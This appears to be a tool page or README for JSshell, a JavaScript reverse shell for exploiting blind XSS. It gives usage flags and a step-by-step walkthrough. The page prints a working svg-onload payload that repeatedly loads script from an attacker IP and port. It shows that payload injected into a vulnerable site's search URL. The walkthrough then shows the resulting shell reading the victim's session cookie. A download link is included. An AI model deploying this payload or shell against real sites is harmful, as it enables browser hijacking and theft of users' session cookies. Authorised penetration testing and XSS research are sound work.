JSshell – JavaScript Reverse Pentest Shell

JSshell

JSshell – a JavaScript reverse shell. This is used to execute JS code remotely, exploit blind XSS, …

This tool works for both Unix and Windows operating systems, and it can run on both Python 2 + Python 3. This is a big update of JShell – a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn’t require Netcat (different from JShell).

New in JSshell version 3.1

Updated in the new version of JShell 3.1:

  • New JSshell command: snippet -> allows to write a snippet of javascript code
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • Quiet mode (for professionals)
  • Added <body> reverse shell payload
  • Fixed some bugs

Usage

Generate JS reverse shell payload: -g

Set the local port number for listening and generating payload (By default, it will be set to 4848): -p

Set the local source address for generating payload (JSshell will detect your IP address by deault): -s

Set timeout for shell connection (if the user exit page, the shell will be pause, and if your set the timeout, after a while without response, the shell will automatically be closed): -w

Execute a command after get the shell: -c

Example usages:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

An example for running JSshell:

This is a step-by-step example for how to use JSshell.

First we will generate a reverse JS shell payload and set the shell timeout is 20 seconds:

~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

Now paste this payload to the website (or URL):

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement(“script”)).src=”//171.224.181.106:4848″},1248)>

Access the page and now we will see that we have got the reverse JS shell:

    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

Now let’s execute some commands:

$ var test = 'controlled'
$ alert(test)
$

And the browser got an alert: controlled

$ prompt(document.cookie)
$

And the browser print the user cookies: JSESSION=3bda8...

$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

Download: https://github.com/shelld3v/JSshell

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